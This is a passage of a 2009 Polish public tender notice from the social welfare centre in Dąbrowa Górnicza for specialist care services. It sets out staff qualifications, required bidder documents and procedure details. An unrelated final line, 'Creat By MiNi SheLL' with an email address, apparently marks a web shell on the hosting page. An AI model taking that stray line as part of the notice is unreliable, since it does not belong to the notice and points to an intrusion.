W przypadku przedstawienia w wykazie osób, którymi Wykonawca będzie dysponował  za zgodą innych podmiotów wymagane jest przedłożenie pisemnego zobowiązania tych podmiotów do udostępnienia  osób zdolnych  do wykonania zamówienia. 

5.1)  Do świadczenia specjalistycznych  usług  opiekuńczych  wymagane jest co najmniej   10  osób posiadających  dokumenty potwierdzające kwalifikacje   określone wymaganiami Rozporządzenia  Ministra    Polityki  w sprawie specjalistycznych usług opiekuńczych   ( Dz. U. z 2006 r. Nr 134, poz. 943 zmieniające rozporządzenie w sprawie specjalistycznych usług opiekuńczych ).


Wymagane są dokumenty potwierdzające następujące kwalifikacje:
a). Specjalistyczne usługi  są świadczone przez  osoby posiadające kwalifikacje do wykonania zawodu: pracownika socjalnego, psychologa, pedagoga,  logopedy, terapeuty zajęciowego, pielęgniarki,  asystenta osoby niepełnosprawnej , opiekunki  środowiskowej , specjalisty w zakresie  rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.

5. 2)  Do świadczenia specjalistycznych  usług dla osób z zaburzeniami psychicznymi wymagane jest co najmniej   8  osób posiadających  dokumenty potwierdzające kwalifikacje   określone wymaganiami Rozporządzenia  Ministra    Polityki Społecznej  ( Dz. U. z 2006 r. 
Nr 134, poz. 943  zmieniające rozporządzenie w sprawie specjalistycznych usług opiekuńczych ). 

Wymagane są dokumenty potwierdzające następujące kwalifikacje:
a).  Osoby  świadczące  specjalistyczne  usługi  dla osób   z zaburzeniami psychicznymi muszą posiadać  kwalifikacje do wykonania zawodu: pracownika socjalnego, psychologa, pedagoga,  logopedy, terapeuty zajęciowego, pielęgniarki,  asystenta osoby niepełnosprawnej, opiekunki środowiskowej , specjalisty w zakresie  rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.

b). Osoby świadczące  specjalistyczne  usługi  dla osób   z zaburzeniami psychicznymi muszą posiadać  co najmniej  półroczny staż  pracy  w jednej z następujących jednostek:
1)  szpitalu psychiatrycznym,
2)  jednostce organizacyjnej pomocy społecznej  dla osób  z zaburzeniami  
     psychicznymi,
3)  placówce  terapii lub placówce oświatowej, do  której  uczęszczają  dzieci  
     z zaburzeniami  rozwoju lub  upośledzeniem  umysłowym,
4)  ośrodku  terapeutyczno - edukacyjno -  wychowawczym,
5)  zakładzie  rehabilitacji,
6)  innej jednostce niż wymienione w pkt 1-5 , świadczącej specjalistyczne usługi 
    opiekuńcze dla osób z zaburzeniami psychicznymi.
  
c). W uzasadnionych przypadkach specjalistyczne usługi  mogą być świadczone przez osoby, - które zdobywają lub podnoszą wymagane kwalifikacje zawodowe:
pracownika socjalnego, psychologa, pedagoga,  logopedy, terapeuty zajęciowego,   pielęgniarki,  asystenta osoby niepełnosprawnej , opiekunki środowiskowej , specjalisty w zakresie  rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi,
- posiadają co najmniej roczny staż pracy w jednostkach:
1)  szpitalu psychiatrycznym,
2)  jednostce organizacyjnej pomocy społecznej  dla osób  z zaburzeniami  
     psychicznymi,
3)  placówce  terapii lub placówce oświatowej, do  której  uczęszczają  dzieci  
     z zaburzeniami  rozwoju lub  upośledzeniem  umysłowym,
4)  ośrodku  terapeutyczno - edukacyjno -  wychowawczym,
5)  zakładzie  rehabilitacji,
6)  innej jednostce niż wymienione w pkt 1-5 , świadczącej specjalistyczne usługi 
     opiekuńcze dla osób z zaburzeniami psychicznymi,
i mają zapewnioną możliwość konsultacji  z osobami świadczącymi  specjalistyczne usługi, posiadającymi wymagane kwalifikacje.
d). muszą posiadać udokumentowane przeszkolenie i doświadczenie w zakresie: umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, kształtowania nawyków celowej aktywności , prowadzenia treningu zachowań społecznych. 

Ponadto do oferty należy załączyć: 
6. Druk oferty wykonany według wzoru Zamawiającego. Wymagana jest oferta wykonana na lub wg ścisłego wzoru Zamawiającego załącznik nr 1 - wskazana aktualna data podpisania dokumentu
7. Zaparafowany  przez Wykonawcę wzór umowy potwierdzający przyjęcie warunków załączonego wzoru umowy -  załącznik nr  3 do SIWZ
8. Pełnomocnictwo do reprezentowania
8.1  wymagane w przypadku, gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentacji nie wynika bezpośrednio  z innych załączonych dokumentów , przedłożone w formie oryginału  lub kopii poświadczonej przez notariusza.
8.2. wymagane w przypadku  Wykonawców wspólnie ubiegających się o zamówienie , przedłożone w formie oryginału lub kopii poświadczonej przez notariusza.

Uwagi:

1. Dokumenty określone w  rozdz. VI pkt1  wymagane są w celu potwierdzenia warunku, że  Wykonawca posiada uprawnienia do wykonania określonej działalności  lub czynności.  

2. Dokumenty określone w  rozdz. VI. pkt 2, VI pkt 3, wymagane są w celu potwierdzenia spełnienia  warunku  określonego znajdowania się Wykonawcy  w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie  zamówienia oraz  że  nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych.

3. Dokumenty określone w rozdz. VI.4, VI 5 (ppkt. 5.1 i 5.2) wymagane są w celu potwierdzenia spełnienia warunku określonego, że  osoby  i podmioty, które będą wykonywać zamówienie posiadają niezbędną wiedzę i kwalifikacje  do wykonania zamówienia z zakresu wykonywanych przez nich specjalistycznych usług opiekuńczych oraz usług specjalistycznych dla osób z zaburzeniami psychicznymi.  


4. Zamawiający  zgodnie  z art. 26 ust. 3 uPzp wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo  którzy złożyli dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia  w wyznaczonym  terminie, chyba , że  mimo ich złożenia   oferta wykonawcy podlega odrzuceniu  lub konieczne byłoby unieważnienie postępowania .
Oświadczenia  lub dokumenty  powinny potwierdzać  spełnienie  przez wykonawcę warunków udziału  w postępowaniu  oraz  spełnienie wymagań  określonych przez  Zamawiającego , nie później  niż w dniu w którym upłynął termin składania ofert.

5. Dokumenty o których mowa wyżej  mogą być złożone w formie  oryginału  lub kopii  poświadczonej za  zgodność z oryginałem  przez  osobę (y)  uprawnione  do podpisywania oferty. Zamawiający może  żądać  przedstawienia oryginału  lub notarialnie  poświadczonej kopii  dokumentu wyłącznie  wtedy, gdy  złożona przez Wykonawcę  kopia dokumentu  jest nieczytelna  lub budzi wątpliwości, co do prawdziwości.

6. Gdy wykonawcę reprezentuje pełnomocnik  do oferty musi być załączone  pełnomocnictwo posiadające zakres i podpisane przez osobę(y)  reprezentującą(e) osobę(y)  prawną(e) lub fizyczną(e)  lub kopię poświadczoną  za zgodność z oryginałem przez notariusza.
Upoważnienie do podpisywania  ofert i występowania  w przetargu  w imieniu wykonawcy musi być dołączone  do oferty  lub musi   bezpośrednio wynikać  z przedstawionych dokumentów. 

7. W przypadku  złożenia oferty  wspólnie  przez kilku Wykonawców należy  dodatkowo  dołączyć  pełnomocnictwo do reprezentowania  Wykonawców  wspólnie  ubiegających się o zamówienie  zgodnie z zapisem  rozdz. VII pkt 3 SIWZ.

8. Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej:

 8.1. Zamiast  dokumentów , o których mowa w rozdziale VI   pkt 1, składa dokument lub dokumenty, wystawione w kraju, w którym  ma siedzibę  lub miejsce  zamieszkania, potwierdzające odpowiednio, że:
1). Nie otwarto jego likwidacji ani nie ogłoszono upadłości
2). Nie orzeczono wobec niego zakazu ubiegania się  o zamówienie 

8.2.  Dokumenty określone w pkt 8.1 ppkt 1 , pkt 8.1 ppkt 2 powinno być wystawione nie wcześniej  niż 6 miesięcy  przed upływem  terminu składania ofert.

8. 3.  Jeżeli w kraju pochodzenia osoby lub  w kraju, w którym  Wykonawca  ma siedzibę  lub miejsce  zamieszkania , nie wydaje się dokumentów , o których mowa w pkt 8. 1 uwag  zastępuje się je  dokumentem   zawierającym  oświadczenie złożone przed notariuszem , właściwym organem sądowym, administracyjnym albo organem  samorządu  zawodowego lub gospodarczego  odpowiednio  kraju pochodzenia  osoby  lub kraju , w którym  Wykonawca  ma siedzibę  lub miejsce zamieszkania .

8.4.   Dokumenty sporządzone w języku obcym Wykonawca dostarcza  wraz z tłumaczeniem  na język polski poświadczonym  przez Wykonawcę.

9.  Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną dotyczącą składania nieprawdziwych zeznań i oświadczeń  wynikającą z art. 297 KK. 
W razie stwierdzenia, że złożone przez dostawcę lub wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 KPK - zawiadomi o tym fakcie właściwy organ ścigania.

10.  Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń, zgodnie z art. 24 ust. 2 pkt. 2 ustawy Prawo zamówień publicznych spowoduje wykluczenie go z postępowania.

11.  Załączone oświadczenia  winny posiadać daty  wystawienia dokumentu świadczące o ich ważności określone w rozdz. VI  niniejszej specyfikacji.
Złożone dokumenty  winny być zgodne  z Rozporządzeniem  Prezesa Rady Ministrów  z dnia 19 maja 2006 r. w sprawie  rodzaju dokumentów , jakich może żądać zamawiający  od wykonawcy , oraz form , w jakich te dokumenty mogą być składane  oraz Rozporządzeniem  Prezesa Rady Ministrów   z dnia 16 października 2008 r. (Dz. U. Nr 188, poz. 1155) zmieniające rozporządzenie w sprawie  rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form , w jakich te dokumenty mogą być składane.  

12. Oferty, opinie biegłych, oświadczenia, informacja z zebrania wykonawców, zawiadomienia, wnioski, inne  dokumenty i informacje składane przez Zamawiającego i wykonawców oraz umowa w sprawie zamówienia publicznego stanowią załączniki do protokołu.

13. Pod używanym w nin. SIWZ pojęciem oferta rozumie się ofertę właściwą tj. wypełniony 
i prawidłowo podpisany druk OFERTA będący załącznikiem nr 1 do specyfikacji istotnych warunków  zamówienia,  a także  dokumenty  wymagane  zgodnie z  artykułem  44 ustawy prawo  zamówień   publicznych  potwierdzające  spełnianie przez  Wykonawcę  warunków udziału w postępowaniu.
Dokumenty te wymieniono enumeratywnie w rozdz. VI nin. SIWZ. Wykonawca  aby  wziąć udział w niniejszym postępowaniu przetargowym winien złożyć ofertę  właściwą i komplet dokumentów podanych w rozdz. VI SIWZ, potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w rozdz. V niniejszej SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 16
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2009 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej
ul. Skibińskiego 1 pok. nr 16
41-300 Dąbrowa Górnicza.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 19.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com